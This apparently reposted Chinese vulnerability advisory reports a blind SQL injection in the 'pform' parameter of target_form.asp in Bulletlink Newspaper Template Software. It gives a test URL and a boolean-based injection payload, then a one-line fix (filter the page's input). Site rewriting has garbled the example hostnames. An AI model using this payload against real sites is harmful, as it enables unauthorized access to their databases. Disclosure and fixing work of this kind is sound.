Bulletlink Newspaper Template Software (target_form.asp) 0day Blind SQL-Injection
作者: easypwn
官网: HdhCmsTestbulletlink测试数据
测试平台: Windows 2000, Windows 2003, Windows 2008. (Microsoft SQL Server)
测试: http://HdhCmsTest2cto测试数据 /target_form.asp?pform={{DeleteMember}}'SQLi
模拟: http://HdhCmsTest2cto测试数据 /target_form. asp ?pform={{DeleteMember}}'%20AND%208589=8589%20AND%20'pRKy'='pRKy
修复:过滤target_form.asp页面参数输入
查看更多关于Bulletlink Newspaper Template Software 0day盲注缺陷及修复的详细内容...
声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://www.haodehen.cn/did11380